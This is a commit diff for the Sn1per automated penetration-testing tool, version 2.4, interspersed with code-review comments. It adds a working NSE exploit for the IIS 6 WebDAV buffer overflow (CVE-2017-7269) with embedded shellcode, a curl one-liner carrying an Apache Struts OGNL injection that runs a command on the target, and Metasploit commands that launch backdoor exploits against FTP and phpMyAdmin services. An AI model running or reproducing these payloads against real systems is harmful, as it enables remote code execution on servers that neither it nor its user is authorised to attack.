
5 Commits
v2.3 ... v2.4

root
10399b6554 Sn1per by 1N3@CrowdShield 2017-04-09 19:30:00 -04:00
root
abeff50be3 Sn1per by 1N3@CrowdShield 2017-04-05 00:00:29 -04:00
root
ff22eb92ff Sn1per by 1N3@CrowdShield 2017-03-16 12:33:11 -04:00
root
fe4587a34c Sn1per by 1N3@CrowdShield 2017-02-18 13:15:38 -05:00
root
e190ab3b78 Sn1per by 1N3@CrowdShield 2017-02-16 10:46:58 -05:00
4 changed files with 265 additions and 49 deletions


@@ -1,4 +1,12 @@
## CHANGELOG:
* v2.4 - Added detection for open X11 servers
* v2.4 - Added IIS6 Win2k3 RCE NMap script
* v2.4 - Added option to disable Google Hacking queries via Firefox
* v2.3d - Fixed issue with loot command
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes
* v2.2e - Changed NMap scan options (removed -P0 flag)
@@ -136,3 +144,7 @@
## FUTURE:
* Add auto logging and reporting to all scans
* Add HTML reporting for scans
* Add automated Wireless attacks to Sn1per
* Add automated MITM attacks to Sn1per
* Add web mode port option for customized web scans

bin/iis-buffer-overflow.nse Normal file

@@ -0,0 +1,181 @@
local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"
-- NSE Buffer Overflow vulnerability in IIS
---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | iis-buffer-overflow:
-- | VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- | State: LIKELY_VULNERABLE
-- | Risk factor: High CVSS: 10.0
-- | Description:
-- | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- | service in Internet Information Services (IIS) 6.0
-- | in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- | arbitrary code via a long header beginning with "If: <http://" in a
-- | PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- | Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- | References:
-- | https://github.com/edwardz246003/IIS_exploit,
-- |_ https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--
author = {
"Zhiniang Peng", -- Original author
"Chen Wu", -- Original author
"Rewanth Cool" -- NSE script author
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}
portrule = shortport.portnumber(80, "tcp")
action = function(host, port)
local socket, response, try, catch, payload, shellcode, vulnerable_name
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
]],
IDS = {
CVE = 'CVE-2017-7269'
},
scores = {
CVSS = '10.0'
},
references = {
'https://github.com/edwardz246003/IIS_exploit',
'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
},
dates = {
disclosure = {year = '2017', month = '03', day = '26'},
}
}
-- If domain name doesn't exist this line of code takes ip into consideration
vulnerable_name = host.targetname or host.ip
socket = nmap.new_socket()
catch = function()
socket:close()
end
try = nmap.new_try(catch)
try(socket:connect(host, port))
-- Crafting the payload by parts
-- Crafting the request with HTTP PROPFIND method
payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
payload = payload .. '\xb3\xe3\x95\xb7'
-- Main payload (Do not edit this part)
payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
payload = payload .. '>'
payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
-- Main payload (Do not edit this part)
payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
-- Shellcode
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
payload = payload .. shellcode
payload = payload .. '>\r\n\r\n'
-- Exploiting the vulnerability
try(socket:send(payload))
-- We receive a 200 response if the payload succeeds.
response = try(socket:receive_bytes(80960))
socket:close()
-- Checking for 200 response in the response
local regex = "HTTP/1.1 (%d+)"
local status = string.match(response, regex)
if status == '200' then
-- Buffer overflow is successfully executed on the server.
vuln.state = vulns.STATE.EXPLOIT,
vuln.exploit_results = response
elseif status == '400' then
-- Bad request error is occured because webdav is not installed.
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 400: Install webdav and try again."
elseif status == '502' then
-- Likely to have an error in the Server Name
vuln.state = vulns.STATE.LIKELY_VULN,
vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
elseif status ~= nil then
vuln.exploit_results = response
end
return vuln_report:make_output(vuln)
end
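Review bot: The trailing commas at the end of the `vuln.state = ...` lines in the 200, 400 and 502 branches (each directly before a `vuln.exploit_results = ...` line) turn every pair into one malformed statement — Lua reads `vuln.state = vulns.STATE.EXPLOIT, vuln.exploit_results` as a multi-value assignment and then rejects the following `=` as an unexpected symbol — so, as rendered here, the script fails to load rather than report anything. Dropping the three commas is the fix: `vuln.state = vulns.STATE.EXPLOIT` followed by `vuln.exploit_results = response`, and likewise for the two LIKELY_VULN branches. Separately, the script is tagged exploit/intrusive and appends live shellcode to the PROPFIND request, yet the header never says what that shellcode does on a host where the overflow succeeds; a sentence in the description stating the payload's effect, and that this is a real exploitation attempt rather than a version check, would let operators decide whether it belongs in an automated scan. The `status == '200'` branch also marks any 200 reply as STATE.EXPLOIT with the raw response as exploit_results, which may misclassify servers that simply answer PROPFIND with 200; consider requiring evidence of the payload's effect in the response before claiming EXPLOIT.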


@@ -47,6 +47,7 @@ echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
mkdir $PLUGINS_DIR
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -63,6 +64,8 @@ git clone https://github.com/nccgroup/shocker.git
git clone https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
cp $PWD/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh
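Review bot: The new `cp $PWD/bin/iis-buffer-overflow.nse ...` line runs after the `cd $PLUGINS_DIR` in the earlier hunk, so `$PWD` is the plugins directory rather than the checkout that holds `bin/`; unless PLUGINS_DIR happens to be the repository root, the copy fails and the sniper web-mode scans that pass `/usr/share/nmap/scripts/iis-buffer-overflow.nse` to nmap by absolute path will error on a missing file. Capture the source tree before changing directory and use it, e.g. `SNIPER_SRC="$(pwd)"` above `cd $PLUGINS_DIR` and `cp "$SNIPER_SRC/bin/iis-buffer-overflow.nse" /usr/share/nmap/scripts/iis-buffer-overflow.nse`. The `wget ... -O` line has the mirror-image failure: `-O` creates the destination before the transfer, so an outage or a 404 leaves an empty or HTML file in nmap's script directory that nmap will later refuse to load; check the exit status (`wget ... -O "$dst" || { rm -f "$dst"; echo "download failed"; }`) instead of ignoring it. Both lines install executable NSE code into a system directory with no integrity check; pinning a revision or comparing a known sha256 before copying would make the install reproducible and reviewable.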

sniper

@@ -32,7 +32,7 @@
# sniper loot
#
VER="2.3"
VER="2.4"
TARGET="$1"
MODE="$2"
OPT1="$3"
@@ -65,6 +65,10 @@ AUTOBRUTE="1"
# DEFAULT IS "1" (ENABLED)
FULLNMAPSCAN="1"
# ENABLE/DISABLE AUTOMATIC GOOGLE HACKING QUERIES
# DEFAULT IS "1" (ENABLED)
GOOHAK="1"
cd $INSTALL_DIR
function loot {
@@ -108,8 +112,8 @@ function loot {
cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,outputs,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,outputs,reports,imports,notes,web}/ -p 2> /dev/null
rm -Rf $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ 2> /dev/null
mkdir $LOOT_DIR/{screenshots,nmap,domains,output,reports,imports,notes,web}/ -p 2> /dev/null
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
iceweasel 2> /dev/null &
sleep 2
@@ -218,7 +222,7 @@ if [ "$MODE" = "discover" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
arp -a -n
echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
unicornscan $TARGET -p $DEFAULT_PORTS 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
unicornscan $TARGET 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
cat $LOOT_DIR/domains/sniper-ips.txt
echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -537,9 +541,9 @@ if [ "$MODE" = "fullportonly" ]; then
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -T4 -sV -O -v -p 1-65535 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p 1-65535 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -T4 -sV -O -v -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p $OPT1 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
exit
@@ -645,13 +649,13 @@ ping -c 1 $TARGET
echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 --open -P0 -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
elif [ "$OPT1" == "web" ]; then
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sV -T5 -P0 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sS -T5 -P0 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 -p U:$OPT1 --open $TARGET
nmap -sU -T5 -P0 -p U:$OPT1 --open $TARGET
fi
if [ -z $DISABLE_POSTGRESQL ]; then service postgresql start; fi
@@ -711,7 +715,7 @@ then
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -723,7 +727,7 @@ else
cd $PLUGINS_DIR/ssh-audit
python ssh-audit.py $TARGET:22
cd $INSTALL_DIR
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
@@ -734,7 +738,7 @@ else
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
@@ -743,7 +747,7 @@ then
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
@@ -753,7 +757,7 @@ then
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ];
@@ -761,7 +765,7 @@ then
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET $USER_FILE
fi
@@ -831,14 +835,14 @@ else
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
nikto -h http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKRED[+]$RESET ;/Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg"
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -864,12 +868,18 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -882,7 +892,7 @@ then
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ];
@@ -914,7 +924,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
